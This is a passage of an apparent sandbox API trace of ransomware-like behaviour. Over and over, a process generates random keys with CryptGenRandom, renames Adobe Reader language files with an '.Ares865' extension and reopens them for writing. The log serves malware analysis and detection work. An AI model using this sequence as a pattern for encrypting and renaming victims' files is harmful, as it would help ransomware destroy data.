10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_it_preeuro.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.177] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28302) returned 1 [0160.178] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.178] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.178] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.183] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.183] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.183] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.184] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ja.txt" | out: lpString1="DisplayLanguageNames.ja.txt") returned="DisplayLanguageNames.ja.txt" [0160.184] lstrlenW (lpString="DisplayLanguageNames.ja.txt") returned 27 [0160.184] lstrlenW (lpString="Ares865") returned 7 [0160.184] lstrcmpiW (lpString1=".ja.txt", lpString2="Ares865") returned -1 [0160.185] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja.txt.Ares865") returned 112 [0160.185] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja.txt.ares865"), dwFlags=0x1) returned 1 [0160.197] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.197] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25962) returned 1 [0160.197] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.198] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.198] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.202] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.202] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.202] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.203] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ja_JP.txt" | out: lpString1="DisplayLanguageNames.ja_JP.txt") returned="DisplayLanguageNames.ja_JP.txt" [0160.203] lstrlenW (lpString="DisplayLanguageNames.ja_JP.txt") returned 30 [0160.203] lstrlenW (lpString="Ares865") returned 7 [0160.203] lstrcmpiW (lpString1="_JP.txt", lpString2="Ares865") returned -1 [0160.204] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja_JP.txt.Ares865") returned 115 [0160.204] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja_JP.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja_jp.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja_JP.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja_jp.txt.ares865"), dwFlags=0x1) returned 1 [0160.206] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja_JP.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja_jp.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.206] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25962) returned 1 [0160.206] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.207] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.207] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.211] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.212] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.212] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.213] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ja_JP_TRADITIONAL.txt" | out: lpString1="DisplayLanguageNames.ja_JP_TRADITIONAL.txt") returned="DisplayLanguageNames.ja_JP_TRADITIONAL.txt" [0160.213] lstrlenW (lpString="DisplayLanguageNames.ja_JP_TRADITIONAL.txt") returned 42 [0160.213] lstrlenW (lpString="Ares865") returned 7 [0160.213] lstrcmpiW (lpString1="NAL.txt", lpString2="Ares865") returned 1 [0160.213] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja_JP_TRADITIONAL.txt.Ares865") returned 127 [0160.213] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja_JP_TRADITIONAL.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja_jp_traditional.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja_JP_TRADITIONAL.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja_jp_traditional.txt.ares865"), dwFlags=0x1) returned 1 [0160.215] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja_JP_TRADITIONAL.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja_jp_traditional.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.215] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=26004) returned 1 [0160.215] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.216] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.216] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.226] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.226] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.226] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.227] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ko.txt" | out: lpString1="DisplayLanguageNames.ko.txt") returned="DisplayLanguageNames.ko.txt" [0160.227] lstrlenW (lpString="DisplayLanguageNames.ko.txt") returned 27 [0160.227] lstrlenW (lpString="Ares865") returned 7 [0160.227] lstrcmpiW (lpString1=".ko.txt", lpString2="Ares865") returned -1 [0160.227] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ko.txt.Ares865") returned 112 [0160.227] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ko.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ko.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ko.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ko.txt.ares865"), dwFlags=0x1) returned 1 [0160.229] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ko.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ko.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.229] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25194) returned 1 [0160.230] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.230] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.231] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.234] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.235] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.235] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.236] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ko_KR.txt" | out: lpString1="DisplayLanguageNames.ko_KR.txt") returned="DisplayLanguageNames.ko_KR.txt" [0160.236] lstrlenW (lpString="DisplayLanguageNames.ko_KR.txt") returned 30 [0160.236] lstrlenW (lpString="Ares865") returned 7 [0160.236] lstrcmpiW (lpString1="_KR.txt", lpString2="Ares865") returned -1 [0160.236] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ko_KR.txt.Ares865") returned 115 [0160.236] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ko_KR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ko_kr.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ko_KR.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ko_kr.txt.ares865"), dwFlags=0x1) returned 1 [0160.241] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ko_KR.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ko_kr.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.241] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25194) returned 1 [0160.241] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.242] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.242] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.247] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.247] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.247] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.248] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.lt.txt" | out: lpString1="DisplayLanguageNames.lt.txt") returned="DisplayLanguageNames.lt.txt" [0160.248] lstrlenW (lpString="DisplayLanguageNames.lt.txt") returned 27 [0160.248] lstrlenW (lpString="Ares865") returned 7 [0160.248] lstrcmpiW (lpString1=".lt.txt", lpString2="Ares865") returned -1 [0160.248] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lt.txt.Ares865") returned 112 [0160.249] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lt.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lt.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lt.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lt.txt.ares865"), dwFlags=0x1) returned 1 [0160.252] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lt.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lt.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.252] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27626) returned 1 [0160.252] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.253] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.253] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.257] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.257] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.257] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.258] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.lt_LT.txt" | out: lpString1="DisplayLanguageNames.lt_LT.txt") returned="DisplayLanguageNames.lt_LT.txt" [0160.258] lstrlenW (lpString="DisplayLanguageNames.lt_LT.txt") returned 30 [0160.258] lstrlenW (lpString="Ares865") returned 7 [0160.258] lstrcmpiW (lpString1="_LT.txt", lpString2="Ares865") returned -1 [0160.258] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lt_LT.txt.Ares865") returned 115 [0160.259] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lt_LT.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lt_lt.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lt_LT.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lt_lt.txt.ares865"), dwFlags=0x1) returned 1 [0160.262] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lt_LT.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lt_lt.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.263] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27626) returned 1 [0160.263] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.265] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.265] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.267] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.268] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.268] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.269] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.lv.txt" | out: lpString1="DisplayLanguageNames.lv.txt") returned="DisplayLanguageNames.lv.txt" [0160.269] lstrlenW (lpString="DisplayLanguageNames.lv.txt") returned 27 [0160.269] lstrlenW (lpString="Ares865") returned 7 [0160.269] lstrcmpiW (lpString1=".lv.txt", lpString2="Ares865") returned -1 [0160.269] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lv.txt.Ares865") returned 112 [0160.269] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lv.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lv.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lv.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lv.txt.ares865"), dwFlags=0x1) returned 1 [0160.271] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lv.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lv.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.271] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27310) returned 1 [0160.272] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.272] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.272] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.275] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.276] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.276] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.277] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.lv_LV.txt" | out: lpString1="DisplayLanguageNames.lv_LV.txt") returned="DisplayLanguageNames.lv_LV.txt" [0160.277] lstrlenW (lpString="DisplayLanguageNames.lv_LV.txt") returned 30 [0160.277] lstrlenW (lpString="Ares865") returned 7 [0160.277] lstrcmpiW (lpString1="_LV.txt", lpString2="Ares865") returned -1 [0160.277] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lv_LV.txt.Ares865") returned 115 [0160.277] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lv_LV.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lv_lv.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lv_LV.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lv_lv.txt.ares865"), dwFlags=0x1) returned 1 [0160.279] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lv_LV.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lv_lv.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.279] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27310) returned 1 [0160.279] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.280] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.280] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.284] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.285] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.285] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.285] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.nb.txt" | out: lpString1="DisplayLanguageNames.nb.txt") returned="DisplayLanguageNames.nb.txt" [0160.285] lstrlenW (lpString="DisplayLanguageNames.nb.txt") returned 27 [0160.286] lstrlenW (lpString="Ares865") returned 7 [0160.286] lstrcmpiW (lpString1=".nb.txt", lpString2="Ares865") returned -1 [0160.286] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nb.txt.Ares865") returned 112 [0160.286] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nb.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nb.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nb.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nb.txt.ares865"), dwFlags=0x1) returned 1 [0160.287] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nb.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nb.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.288] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28146) returned 1 [0160.288] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.289] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.289] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.292] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.293] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.293] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.294] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.nb_NO.txt" | out: lpString1="DisplayLanguageNames.nb_NO.txt") returned="DisplayLanguageNames.nb_NO.txt" [0160.294] lstrlenW 